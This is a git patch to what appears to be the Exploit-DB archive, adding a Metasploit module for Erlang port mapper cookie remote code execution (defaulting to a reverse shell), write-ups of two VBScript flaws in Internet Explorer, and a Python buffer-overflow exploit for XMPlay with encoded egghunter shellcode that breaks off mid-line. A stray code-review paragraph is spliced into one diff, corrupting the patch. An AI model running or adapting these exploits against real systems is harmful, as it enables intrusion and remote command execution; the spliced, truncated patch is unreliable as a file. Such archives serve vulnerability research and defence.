From 1ddc5edd5d3879fd8a68c1c69ddf6e9e06a3c9a8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 21 Dec 2018 05:01:52 +0000
Subject: [PATCH] DB: 2018-12-21
6 changes to exploits/shellcodes
VBScript - VbsErase Reference Leak Use-After-Free
VBScript - MSXML Execution Policy Bypass
LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)
XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution
Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
Erlang - Port Mapper Daemon Cookie RCE (Metasploit)
---
exploits/multiple/remote/46024.rb | 156 ++++++++++++++++++++++++++++
exploits/windows/dos/46022.txt | 60 +++++++++++
exploits/windows/dos/46023.txt | 11 ++
exploits/windows/local/46020.py | 82 +++++++++++++++
exploits/windows/local/46021.py | 77 ++++++++++++++
exploits/windows_x86/local/46018.py | 126 ++++++++++++++++++++++
files_exploits.csv | 6 ++
7 files changed, 518 insertions(+)
create mode 100755 exploits/multiple/remote/46024.rb
create mode 100644 exploits/windows/dos/46022.txt
create mode 100644 exploits/windows/dos/46023.txt
create mode 100755 exploits/windows/local/46020.py
create mode 100755 exploits/windows/local/46021.py
create mode 100755 exploits/windows_x86/local/46018.py
diff --git a/exploits/multiple/remote/46024.rb b/exploits/multiple/remote/46024.rb
new file mode 100755
index 000000000..92a0bfc8d
--- /dev/null
+++ b/exploits/multiple/remote/46024.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Erlang Port Mapper Daemon Cookie RCE',
+ 'Description' => %q{
+ The erlang port mapper daemon is used to coordinate distributed erlang instances.
+ Should an attacker get the authentication cookie RCE is trivial. Usually, this
+ cookie is named ".erlang.cookie" and varies on location.
+ },
+ 'Author' =>
+ [
+ 'Daniel Mende', # blog post article
+ 'Milton Valencia (wetw0rk)', # metasploit module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix', 'win'],
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => 'false',
+ 'Targets' =>
+ [
+ [ 'Unix',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+ ],
+ [ 'Windows',
+ 'Platform' => 'win',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
+ Opt::RPORT(25672)
+ ])
+ end
+
+ def generate_challenge_digest(challenge)
+ challenge = challenge.unpack('H*')[0].to_i(16).to_s
+
+ hash = Digest::MD5.new
+ hash.update(datastore['COOKIE'])
+ hash.update(challenge)
+
+ vprint_status("MD5 digest generated: #{hash.hexdigest}")
+ return [hash.hexdigest].pack('H*')
+ end
+
+ def exploit
+ connect
+
+ our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
+
+ # SEND_NAME: send initial identification of who "we" are
+ send_name = "\x00" # Length: 0x0000
+ send_name << [(our_node.length+7).to_s(16)].pack('H*') #
+ send_name << "\x6e" # Tag: n
+ send_name << "\x00\x05" # Version: R6 (5)
+ send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
+ send_name << "#{our_node}" # @
+
+ # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
+ send_challenge_reply = "\x00\x15" # Length: 21
+ send_challenge_reply << "\x72" # Tag: r
+
+ # SEND: send the message to the node
+ send = "\x00\x00\x00" # Length:0x00000000
+ send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
+ send << "\x70" #
+ send << "\x83" # VERSION_MAGIC
+ send << "\x68" # SMALL_TUPLE_EXT (104)
+ send << "\x04" # Arity: 4
+ send << "\x61" # SMALL_INTEGER_EXT
+ send << "\x06" # Int: 6
+ send << "\x67" # PID_EXT (103)
+ send << "\x64\x00" # Node:
+ send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
+ send << "#{our_node}" # Node
+ send << "\x00\x00\x00\x03" # ID
+ send << "\x00\x00\x00\x00" # Serial
+ send << "\x00" # Creation
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x00" # Len: 0x0000
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x03" # Length: 3
+ send << "rex" # AtomText: rex
+ send << "\x83\x68\x02\x67\x64\x00" #
+ send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
+ send << "#{our_node}" # Node
+ send << "\x00\x00\x00\x03" # ID
+ send << "\x00\x00\x00\x00" # Serial
+ send << "\x00" # Creation
+ send << "\x68" # SMALL_TUPLE_EXT (104)
+ send << "\x05" # Arity: 5
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x04" # Length: 4
+ send << "call" # AtomText: call
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x02" # Length: 2
+ send << "os" # AtomText: os
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x03" # Length: 3
+ send << "cmd" # AtomText: cmd
+ send << "\x6c" # LIST_EXT
+ send << "\x00\x00\x00\x01" # Length: 1
+ send << "\x6b" # Elements: k
+ send << "\x00" # Tail
+ send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command)
+ send << payload.raw # Command
+ send << "\x6a" # NIL_EXT
+ send << "\x64" # InternalSegmentIndex
+ send << "\x00\x04" # Length: 4
+ send << "user" # AtomText: user
+
+ sock.put(send_name)
+
+ # recieve servers "SEND_CHALLENGE" token (4 bytes)
+ print_status("Receiving server challenge")
+ challenge = sock.get
+ challenge = challenge[14,4]
+
+ send_challenge_reply << challenge
+ send_challenge_reply << generate_challenge_digest(challenge)
+
+ print_status("Sending challenge reply")
+ sock.put(send_challenge_reply)
+
+ if sock.get.length < 1
+ fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")
+ end
+
+ print_good("Authentication successful, sending payload")
+ sock.put(send)
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/dos/46022.txt b/exploits/windows/dos/46022.txt
new file mode 100644
index 000000000..26cb7e0d5
--- /dev/null
+++ b/exploits/windows/dos/46022.txt
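Review bot: `challenge = sock.get` followed by `challenge = challenge[14,4]` trusts that the peer answered with a complete SEND_CHALLENGE frame; if the connection was closed or the reply is short or unrelated, `sock.get` yields nil or a short string and `generate_challenge_digest` then dies with a NoMethodError on `unpack` instead of a clean module failure. The final `if sock.get.length < 1` has the same nil problem, and neither read checks the message tag, so a wrong cookie and a dropped connection are indistinguishable in the output. Suggested guard: `resp = sock.get`, then `fail_with(Failure::UnexpectedReply, 'No challenge received') if resp.nil? || resp.length < 18`, then `challenge = resp[14, 4]`, with the same nil check before the final length test. Separately, `'Privileged' => 'false'` is a non-empty string and therefore truthy in Ruby, while the metadata key is documented as a boolean; it should read `'Privileged' => false`.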
@@ -0,0 +1,60 @@
+There is an reference leak in Microsoft VBScript that can be turned into an use-after-free given sufficient time. The vulnerability has been confirmed in Internet Explorer on various Windows versions with the latest patches applied.
+
+Details:
+
+VbsErase function is used to reset and free the contents of a VBScript array. When this function is called on a VBScript variable of the type array (implemented as a VAR structure containing a type followed by a value, in this case a pointer to a SafeArray object), the function follows these steps:
+
+1. Get the pointer to a SafeArray object from the VBScript variable and store it locally
+2. Set the pointer value in the VBScript variable to 0 (null)
+3. Release the array members (by calling SafeArrayDestroyData)
+4. Restore the pointer from step 2
+5. Destroy the array object itself (by calling SafeArrayDestroyDescriptor)
+6. Once again, set the pointer value in the VBScript variable to null
+
+The dance with setting the pointer to null and restoring it was made to address previously reported vulnerabilities described in http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html.
+
+However, this also introduced another bug. Specifically, if during SafeArrayDestroyData a user-defined callback runs, the callback can set the value of the VBScript variable passed to VbsErase to some other object (which increases the reference count of the object). If that happens, in steps 4 and 6 above, the pointer to the object will be overwritten, thus preventing its reference count to get properly decremented when the VBScript variable is assigned some other value.
+
+Consider the following code snippet:
+
+====================================
+
+Class class1
+End Class
+
+Class class2
+ Private Sub Class_Terminate()
+ ' increase the reference count of c
+ set a = c
+ End Sub
+End Class
+
+' create an object of class1 and increase its reference count
+c = new class1
+a = Array(0)
+set a(0) = new class2
+' call Class_Terminate of class2
+Erase a
+' a has been set to null so the following line doesn't affect c in any way
+a = 1
+' decrease the reference count of c
+c = 1
+' at this point the referenc couter of c is 1 instead of 0
+
+====================================
+
+When the code snippet finishes, the class1 object createad on the first line continues to live, even though all references to it have been lost so it should have been destroyed. This same principle can be used to increase the reference count of an arbitrary object any number of times without incurring a memory cost, eventually overflowing the 32-bit reference counter.
+
+Note that, while custom classes in VBScript have protection against overflowing a reference counter, this isn't the case for built-in objects (compare VBScriptClass::AddRef to AddRef methods of other classes). Because of this, the PoCs below use a RegExp object.
+
+The only problem is that for every reference counter increment, a new array has to be created and destroyed and a user-defined Class_Terminate needs to run which all takes time. Overflowing the 32-bit reference counter can take around 2 hours (depending on the CPU) and way longer if page heap is enabled for the iexplore.exe process.
+
+leak1.html (in attachment) contains the full PoC and leak1.txt contains a debug log for this.
+
+If you don't want to wait, a quicker way to demonstrate the issue is to just run the reference counter increase for certain number of iterations, and then increase it further (close to overflowing) via a debugger.
+
+leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a 64 bit process with page heap enabled).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46022.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/46023.txt b/exploits/windows/dos/46023.txt
new file mode 100644
index 000000000..a76591367
--- /dev/null
+++ b/exploits/windows/dos/46023.txt
@@ -0,0 +1,11 @@
+According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
+
+However, the VBScript execution policy does not appear to cover VBScript code in MSXML xsl files which can still execute VBScript, even when loaded from the Internet Zone.
+
+To demonstrate, place the files in the attached archive on a web server in the Internet zone and open index.html. If successful, the text "Hello from VBscript" will be rendered on the page. If you look at the provided code, this text is assembled dynamically by VBScript.
+
+This has been tested on Windows 10 Version 1803 with the latest patches applied and VBScript execution policy applied for the Internet Zone (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\140C = 3).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46023.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46020.py b/exploits/windows/local/46020.py
new file mode 100755
index 000000000..fe7783fd8
--- /dev/null
+++ b/exploits/windows/local/46020.py
@@ -0,0 +1,82 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC) +# Date: 2018-12-19 +# Exploit Author: s7acktrac3 +# Vendor Homepage: https://www.xmplay.com/ +# Software Link: https://support.xmplay.com/files_view.php?file_id=676 +# Version: 3.8.3 (latest) +# Tested on: Windows XP SP3 +# CVE : Reserved +# +# Developer notified & delivered PoC but not interested in fixing :P +# +# Reproduction Steps: +# Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u +# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load" +# for a minute (exploit searching through memory for payload) and eventually launch calc.exe +# +# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a +# beast! + +from struct import pack + +max_size = 728 +# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py +eip_offset = 500 + +file_header = "#EXTM3U\n\r" +file_header += "#EXTINF:200,Sleep Away\n\r" +file_header += "http://test." 
+ +# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin +# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows +encoded_egg_hunter = ("" +"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" +"\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50" +"\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44" +"\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e" +"\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34" +"\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a" +"\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41") + +encoded_calc = "w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI +encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49" +encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51" +encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" +encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78" +encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64" +encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37" +encoded_calc += "\x6b\x4f\x38\x50\x41\x41" + +egg_addr_to_edx = "" +egg_addr_to_edx += "\x54" # PUSH ESP +egg_addr_to_edx += "\x58" # POP EAX +egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C +egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C +egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C +egg_addr_to_edx += "\x50" # PUSH eax +egg_addr_to_edx += "\x5A" # POP EDX + + +payload = "A" * 12 +payload += encoded_calc +payload += "A" * (eip_offset - len(payload)) +print "Length of payload " + str(len(payload)) +payload += pack("